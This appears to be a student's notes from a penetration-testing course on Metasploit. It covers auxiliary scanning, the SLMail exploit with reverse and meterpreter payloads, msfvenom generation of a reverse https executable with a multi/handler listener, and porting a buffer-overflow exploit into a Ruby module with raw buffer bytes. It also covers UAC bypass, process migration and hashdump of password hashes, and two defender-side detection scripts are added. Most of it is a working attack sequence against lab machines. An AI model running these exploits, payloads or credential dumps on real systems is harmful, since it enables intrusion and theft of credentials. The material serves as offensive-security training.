

We have used Metasploit previously in past modules of this course: we've generated shellcode, calculated buffers, and translated assembly to opcodes using utilities from this framework. So what exactly is it? As described by its authors, the metasploit framework is an advanced open-source platform written in ruby for developing, testing and using exploit code.

Metasploit can be handy in almost any phase of a penetration test, from passive and active information gathering to vulnerability research and development all the way to client side attacks and post-exploitation techniques.

There are several user interfaces that we can use to operate the metasploit framework. The most popular is the interactive console, msfconsole.

MSF requires several services to be running that are not enabled at boot time in Kali Linux.

To start the required postgres and metasploit service dependencies we can simply start them as we would any other service.
#/etc/init.d/postgresql start
#/etc/init.d/metasploit start

Now that everything is set up, we can start exploring the various exploits, auxiliary modules, payloads and plugins that the metasploit framework has to offer us.

To start the console, run msfconsole.

The help command can get us started with the basic options msf has to offer.

METASPLOIT FRAMEWORK - Auxiliary modules

The metasploit framework contains hundreds of auxiliary modules which provide various functionality such as protocol enumeration, host discovery and more. These modules all follow a common usage syntax which makes them easy to explore and use. Let's try using some of these auxiliary modules and get a feel for the syntax needed to run the metasploit framework.

The "show auxiliary" command will display a long list of all the different auxiliary modules in the metasploit framework that can be used for various tasks such as information gathering, located under the 'gather' hierarchy, scanning and enumeration of various services located under the 'scanner' hierarchy, and so on.

#show auxiliary


I'll quickly search for snmp to get a list of all exploits and modules which contain this string.

#search snmp

I receive a list that includes some basic snmp discovery modules. So let's go ahead and use this module.

msf>use auxiliary/scanner/snmp/snmp_enum

And let's get more info about this module

Now we need to figure out how to use this auxiliary module.
#show options

Note that some parameters are required to be entered before this module can run. In this case we want to add the RHOSTS and THREADS for faster scanning.
msf>set RHOSTS
msf>set THREADS 10

With all required parameters set we can now run this module:

The scanner has now run and has enumerated machines with the snmp protocol enabled and configured for public access.
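What snmp_enum keys on is a v1/v2c community that is guessable and reachable from anywhere. As an added defender-side check (not part of the course notes or of metasploit), this Python audit flags those settings in a net-snmp style snmpd.conf; the excerpts are constructed and the directive layout is an assumption.

```python
# Constructed snmpd.conf excerpts (an assumption about the net-snmp directive
# layout, not copied from any real host): the first is what snmp_enum would
# walk with the community "public", the second restricts v1/v2c to one
# monitoring host with a non-default community and prefers an SNMPv3 user.
WEAK_CONF = """\
# stock configuration left in place
rocommunity public
rwcommunity private 10.0.0.0/24
com2sec readonly default public
"""
HARDENED_CONF = """\
rocommunity Zq9-monitoring-ro 10.0.0.10
rouser monitor priv
"""

# Community names that every scanner tries first.
DEFAULT_COMMUNITIES = {"public", "private"}
ANY_SOURCE = {"default", "0.0.0.0/0", "::/0"}

def audit_snmpd_conf(text):
    """Return (line_no, reason, directive) findings for v1/v2c community
    directives that use a default name, accept any source, or grant writes."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()   # drop comments
        if not line:
            continue
        parts = line.split()
        directive = parts[0].lower()
        if directive in ("rocommunity", "rwcommunity") and len(parts) >= 2:
            # rocommunity COMMUNITY [SOURCE [OID]]; a missing SOURCE means any
            community = parts[1]
            source = parts[2] if len(parts) >= 3 else "default"
        elif directive == "com2sec" and len(parts) >= 4:
            # com2sec SECNAME SOURCE COMMUNITY
            source, community = parts[2], parts[3]
        else:
            continue
        if community.lower() in DEFAULT_COMMUNITIES:
            findings.append((no, "default community string", line))
        if source in ANY_SOURCE:
            findings.append((no, "reachable from any source address", line))
        if directive == "rwcommunity":
            findings.append((no, "write access over v1/v2c", line))
    return findings
```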


Let's use the SMB version scanner
msf>use auxiliary/scanner/smb/smb_version
msf>show options
msf>set RHOSTS
msf>set THREADS 10

So the SMB OS Discovery module ran and enumerated machines with open SMB ports.

In the event that we want to set input parameters such as RHOSTS globally, we can use setg instead of set, e.g.:
msf>setg RHOSTS


msf>use auxiliary/scanner/http/webdav_scanner
msf>show options

If we used setg, THREADS and RHOSTS will already be set. Let's run the module.

This module has scanned our network and discovered machines with the WebDAV service enabled.

Taking some time to review the various auxiliary modules that the metasploit framework has to offer is a recommended exercise.


If the metasploit and postgresql services are started ahead of time, the metasploit framework will log its findings and information about discovered hosts in a convenient and accessible database. To display all discovered hosts up to this point, we can give the 'hosts' command from within msfconsole.


To further populate this database, we can use the db_nmap metasploit wrapper to scan hosts with nmap and have the scan output inserted in to the database.

msf>db_nmap --top-ports 20

Once the scan is done, we can query the database for machines with specific properties. For example we can look for all machines with port 443 open.

msf>services -p 443

You can search for all the modules affecting a particular platform using the built-in search functionality of msfconsole. For example, use

msf> search platform:"Windows XP SP3" type:exploit

should find all the modules affecting Windows XP SP3. Try other variations as well, such as Windows XP Service Pack 3 etc., to get an idea.

Using the database - check out the looting commands towards the end.

METASPLOIT FRAMEWORK - Metasploit Exploits

An example using SLMAIL exploit. In this example the payload is altered.

msf>search pop3
msf>use exploit/windows/pop3/seattlelab_pass
msf>set PAYLOAD windows/shell_reverse_tcp
msf>show options
msf>set RHOST
msf>set LHOST
msf>set LPORT 443

METASPLOIT FRAMEWORK - Metasploit Payloads

Up to now, we have limited our payload use in metasploit to simple standard reverse shell payloads.

Let's take some time to examine some additional payloads that the metasploit framework has to offer. One of the first distinctions worth noting among metasploit payloads is between staged and non-staged shellcode.

A non-staged payload is a payload that is sent in its entirety, as we have done up to this point.

A staged payload is usually sent in 2 parts. The first is a small primary payload (the stager) which usually instructs the victim to connect back to the attacker and accept a larger secondary payload (the stage), and then executes it.


One of the most powerful staged payloads that the metasploit framework has to offer is the meterpreter payload. Meterpreter is a staged multifunction payload that can be dynamically extended at run time. In practice this means that the meterpreter shell provides more features and functionality than a regular shell by having built-in file uploads and downloads, keyloggers and so on. This additional functionality makes meterpreter the favourite and most commonly used payload in the metasploit framework.

Let's get a taste of the meterpreter payload by swapping out our non-staged reverse shell for a reverse meterpreter connection in our slmail exploit.

msf>set PAYLOAD windows/meterpreter/reverse_tcp
msf>show options

We now have a meterpreter shell on the windows lab machine. The help command will provide a list of commands that the meterpreter payload has to offer.


meterpreter>search -f *pass*.txt

METASPLOIT FRAMEWORK - Meterpreter in Action

Meterpreter simplifies many of the post exploitation processes such as uploading and downloading files. Let's try uploading and downloading netcat to the victim machine using the meterpreter upload function.

meterpreter>upload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec\\Desktop

In much the same way we can also download files from the victim to our attacking box.

meterpreter>download c:\\Windows\\system32\\calc.exe /tmp/calc.exe

To directly interact with a victim machine's command prompt, we can simply type the shell command.


The huge advantage of spawning a shell from within meterpreter is that if for some reason our shell should die, we can simply spawn a new one from within the meterpreter session.

Let's look at some additional payloads that the metasploit framework has to offer us.

METASPLOIT FRAMEWORK - Additional Payloads

Metasploit offers us a huge variety of shellcode payloads, from payloads that connect to a victim machine using VNC to payloads which tunnel themselves out of an organisation using DNS queries. Getting to know these various payloads can help us significantly during a penetration test.

For example, the reverse meterpreter https payload is designed to encapsulate meterpreter communications within https requests allowing us to bypass most deep packet inspection filters.

Another nice example is the reverse_tcp_allports payload, which attempts to connect back to our attacking machine on all ports. This is useful in situations where we are not sure what egress firewall rules are in place.
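From the defender's side, reverse_tcp_allports leaves a distinctive trace: one internal host trying one external address on many destination ports in a few seconds, mostly as firewall denies. This added Python detector (not from the course notes or metasploit) runs that sliding-window check over constructed egress firewall log lines; the log format is an assumption.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed egress firewall log format (an assumption, not any vendor's).
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<action>ALLOW|DENY) src=(?P<src>[\d.]+) "
    r"dst=(?P<dst>[\d.]+) proto=tcp dport=(?P<dport>\d+)$"
)

# Constructed sample: 10.0.0.5 walks ports 1..5 on 203.0.113.9 within two seconds
# until 443 gets through (reverse_tcp_allports pattern); 10.0.0.7 is normal browsing.
SAMPLE_LOG = """\
2024-05-01T10:00:00Z DENY src=10.0.0.5 dst=203.0.113.9 proto=tcp dport=1
2024-05-01T10:00:00Z DENY src=10.0.0.5 dst=203.0.113.9 proto=tcp dport=2
2024-05-01T10:00:00Z DENY src=10.0.0.5 dst=203.0.113.9 proto=tcp dport=3
2024-05-01T10:00:01Z DENY src=10.0.0.5 dst=203.0.113.9 proto=tcp dport=4
2024-05-01T10:00:01Z DENY src=10.0.0.5 dst=203.0.113.9 proto=tcp dport=5
2024-05-01T10:00:01Z ALLOW src=10.0.0.5 dst=203.0.113.9 proto=tcp dport=443
2024-05-01T10:00:03Z ALLOW src=10.0.0.7 dst=203.0.113.20 proto=tcp dport=443
2024-05-01T10:05:00Z ALLOW src=10.0.0.7 dst=203.0.113.20 proto=tcp dport=80
"""

def parse(lines):
    """Yield (timestamp, src, dst, dport) for every line matching LOG_RE."""
    for line in lines:
        m = LOG_RE.match(line.strip())
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
            yield ts, m["src"], m["dst"], int(m["dport"])

def find_port_walkers(lines, min_ports=5, window=timedelta(seconds=10)):
    """Return {(src, dst): sorted ports} for source/destination pairs that hit
    at least min_ports distinct destination ports inside one sliding window."""
    events = defaultdict(list)  # (src, dst) -> [(ts, dport), ...]
    for ts, src, dst, dport in parse(lines):
        events[(src, dst)].append((ts, dport))
    hits = {}
    for pair, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:   # slide window start
                start += 1
            ports = {p for _, p in evs[start:end + 1]}
            if len(ports) >= min_ports:
                hits[pair] = sorted(ports)
                break   # one finding per pair is enough to raise an alert
    return hits
```

Tune min_ports and window to the environment; a host that legitimately talks to a dozen services on one server over a day will not trip the 10-second window.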


The metasploit framework not only has a wide range of available payloads, but can also output these payloads in various file types and formats such as asp, vbscript, java executables, windows DLLs, PE binaries and more.

Let's take a look at the msfvenom utility and get a listing of the payloads available to us.

#msfvenom -l

This produces a really long list of all the different types of payloads that msfvenom can generate.

Let's use msfvenom to generate a windows reverse meterpreter https pe executable.

#msfvenom -p windows/meterpreter/reverse_https LHOST= LPORT=443 -f exe --platform windows -a x86 > /var/www/html/reverse_met_https.exe

Check the file is as expected:
#file /var/www/html/reverse_met_https.exe

Download this file now to the windows 7 lab machine.

Before running the executable on the windows machine we first need to set up a listener on our attacking box.

METASPLOIT FRAMEWORK - The Multihandler Module

The metasploit multi/handler module can accept various payloads and handle them correctly, including single and multi-staged payloads.


msf>use exploit/multi/handler
msf>set PAYLOAD windows/meterpreter/reverse_https
msf>show options
msf>set LHOST
msf>set LPORT 443

The handler/listener is now running.

Now we can run the PE on the windows machine that we created in the last module. Once executed, we have a meterpreter session:



Let's take a look at what it takes to port some of our exploits to the metasploit framework.

See exercise

#nc -nvlp 443

Execute the exploit:

In this example, the SLMAIL exploit is ported. For the exercise, I want to do the same for my crossfire exploit.

Create the required metasploit directory structure under the root home directory so that we don't corrupt the metasploit CAD package.

#mkdir -p ~/.msf4/modules/exploits/windows/misc
Enter the directory.
#cd ~/.msf4/modules/exploits/windows/misc

Copy an existing SLMAIL exploit to this directory so that it can be used as a template.

#cp /usr/share/metasploit-framework/modules/exploits/windows/pop3/seattlelab_pass.rb ./vulnserver.rb

And proceed to edit the template that was just copied over.
#nano vulnserver.rb

Start by changing the name, description and author of the exploit.

Update the space for the ShellCode - 800 bytes
Update the return address to match the one that we used in our python code. - 0x65d11d71
Update the target description "Universal JMP ESP address"
Update the default RPORT to 5555

Now it is time to recreate our exploit buffer within this Ruby exploit.
Remove the previous buffer setup for the slmail exploit.
For reference purposes, paste the buffer taken from the python exploit.

Using the python buffer as a reference, recreate the buffer in ruby.

Example from the video:

This goes after
def exploit

My modified buffer goes here.

and before

request = "AUTH" + make_nops(40)
request << payload.encoded
request << make_nops(1000-payload.encoded.length)
request << [target.ret].pack('V')
request << "\x81\xC4\x54\xF2\xFF\xFF"
request << "\xe9\xf9\xfb\xff\xff"
request << rand_text_alpha(400)

Now we save and exit.

Proceed to load it within the metasploit framework.

msf>search vulnserver
msf>use exploit/windows/misc/vulnserver
msf>set PAYLOAD windows/meterpreter/reverse_tcp
msf>set LHOST
msf>set LPORT 443
msf>set RHOST

Make sure that the vulnerable server is running on the windows machine by running the shortcut in the tools directory.


We have a shell.


See exercise

#nc -nvlp 443

Execute the exploit


1. Create a new directory in metasploit.
2. Create a new file in this directory and copy in the contents of the example exploit in the pdf.
3. Test using this exploit as is.
4. Adjust the values to match what it is I have in my exploit.
5. Test the exploit once more.

This is now working and the exploit is listed as crossfireSaidshow2.rb


So far we have seen file uploads and downloads along with simple session management; however, the metasploit framework has much more to offer in this field, from privilege escalation and dumping windows hashes to running keyloggers and even taking screenshots of the victim machine. But before we start, it's crucial to get a full understanding of the privileges we have on the system, especially when working with the windows OS.

Let's use a reverse meterpreter shell as an example.

While our shell may have been run by an admin user, we may still face restrictions such as UAC or require process migration for our post exploitation modules to work.

The getuid command shows that we have the privileges of the 'offsec' user. We already know that this user is an admin.


The getprivs command shows that the current shell has UAC restrictions imposed on it.


This means if we try and run a post exploitation module such as 'hashdump', the process may fail as I do not have the correct privileges to run this module. In this case I will first need to bypass UAC.

In order to bypass UAC, I need to background the current meterpreter session: meterpreter>background

Now invoke a metasploit module able to bypass UAC.

msf>use exploit/windows/local/bypassuac

msf>set SESSION 1

msf>set PAYLOAD windows/meterpreter/reverse_tcp

msf>set LHOST

msf>set LPORT 8888 (NOTE: This needs to be a port that is not already in use. Eg, a different port to the original session.)


This will upload a file and execute a new reverse shell with improved privileges. See with the getprivs command that there is now a much larger set of privileges.


Now that we have a non-UAC-restricted admin shell, let's try hashdump once more.


This fails once more. This module needs to run with system privileges.

To solve this problem we can try migrating the current meterpreter process to an existing process that is running with system privileges such as the SNMP service.

List all running processes and their privileges with the ps command.


Let's have meterpreter migrate to this process.

meterpreter>migrate 1468

A getuid command should now show that the meterpreter process is running with system privileges.


Hashdump now completes successfully.


Background this second system-privileged shell and list all sessions that we currently have:


msf>sessions -l